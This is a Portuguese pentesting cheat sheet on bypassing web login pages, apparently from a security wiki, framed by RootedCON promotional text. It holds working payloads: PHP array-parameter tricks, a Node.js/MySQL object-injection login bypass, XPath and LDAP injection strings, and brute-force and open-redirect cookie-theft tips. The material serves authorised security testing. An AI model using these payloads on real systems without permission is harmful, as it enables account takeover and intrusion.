Login Bypass

RootedCON é o evento de cibersegurança mais relevante na Espanha e um dos mais importantes na Europa. Com a missão de promover o conhecimento técnico, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.

Bypass de login regular

Se você encontrar uma página de login, aqui estão algumas técnicas para tentar contorná-la:

• Verifique os comentários dentro da página (role para baixo e para a direita?)

• Verifique se você pode acessar diretamente as páginas restritas

• Verifique para não enviar os parâmetros (não envie nenhum ou apenas 1)

• Verifique o erro de comparações PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

• Altere o tipo de conteúdo para json e envie valores json (bool true incluído)

• Se você receber uma resposta dizendo que POST não é suportado, pode tentar enviar o JSON no corpo, mas com uma solicitação GET com Content-Type: application/json

• Verifique o potencial erro de análise do nodejs (leia isso): password[password]=1

• O nodejs transformará essa carga útil em uma consulta semelhante à seguinte: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; o que faz com que a parte da senha seja sempre verdadeira.

• Se você puder enviar um objeto JSON, pode enviar "password":{"password": 1} para contornar o login.

• Lembre-se de que para contornar este login você ainda precisa saber e enviar um nome de usuário válido.

• Adicionar a opção "stringifyObjects":true ao chamar mysql.createConnection eventualmente bloqueará todos os comportamentos inesperados quando Object for passado no parâmetro.

• Verifique as credenciais:

• Credenciais padrão da tecnologia/plataforma utilizada

• Combinações comuns (root, admin, password, nome da tecnologia, usuário padrão com uma dessas senhas).

• Crie um dicionário usando Cewl, adicione o nome de usuário e a senha padrão (se houver) e tente forçar a entrada usando todas as palavras como nomes de usuário e senhas

• Forçar usando um dicionário maior (Força bruta)

Bypass de autenticação por injeção SQL

Aqui você pode encontrar vários truques para contornar o login via injeções SQL.

Na página seguinte, você pode encontrar uma lista personalizada para tentar contornar o login via injeções SQL:

Bypass de autenticação sem injeção SQL

Aqui você pode encontrar vários truques para contornar o login via sem injeções SQL.

Como as injeções NoSQL exigem a alteração do valor dos parâmetros, você precisará testá-los manualmente.

Bypass de autenticação por injeção XPath

Aqui você pode encontrar vários truques para contornar o login via injeção XPath.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Bypass de autenticação por injeção LDAP

Aqui você pode encontrar várias dicas para contornar o login via LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Lembre-se de Mim

Se a página tiver a funcionalidade "Lembre-se de Mim", verifique como ela é implementada e veja se você pode abusar disso para assumir outras contas.

Redirecionamentos

As páginas geralmente redirecionam os usuários após o login, verifique se você pode alterar esse redirecionamento para causar um Open Redirect. Talvez você possa roubar algumas informações (códigos, cookies...) se redirecionar o usuário para o seu site.

Outras Verificações

• Verifique se você pode enumerar nomes de usuário abusando da funcionalidade de login.

• Verifique se o preenchimento automático está ativo nos formulários de senha/informações sensíveis input: <input autocomplete="false"

​​RootedCON é o evento de cibersegurança mais relevante na Espanha e um dos mais importantes na Europa. Com a missão de promover o conhecimento técnico, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.